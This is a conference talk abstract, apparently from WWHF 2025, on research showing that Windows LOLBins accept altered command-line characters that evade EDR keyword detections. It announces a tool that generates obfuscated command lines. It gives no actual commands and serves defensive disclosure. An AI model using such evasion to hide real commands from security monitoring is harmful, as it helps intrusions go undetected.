WWHF @ Mile High 2025

Most Endpoint Detection & Response solutions (‘EDRs’) heavily rely on analysing process events for detecting suspicious behaviour; in particular, command-line arguments are inspected for keywords or character sequences that may indicate malicious activity. This is still common practice, despite the widely known fact that a process’ command line can be altered, hidden, or otherwise spoofed, which may bypass such defensive measures.  Lesser known is that, particularly on Windows operating systems, there is a wealth of system-native programs that happily accept ‘unexpected’ command-line transformations, such as character substitutions, deletions or insertions. An implication of this is that command-line-based detections can be bypassed with minimal effort, and unlike command-line spoofing, without the need for special system calls. Tools vulnerable to this include those often leveraged in attacks that ‘live off the land’ (also known as LOLBins or LOLBAS).   This talk will show, based on empirical analysis of the 60 most commonly used LOLBins, how many detections can bypassed making minimal tweaks to how a LOLBins are called. Furthermore, we will introduce a new web-based tool that not only documents the results for all these executables, it allows everyone to generate obfuscated command lines themselves with the click of a button.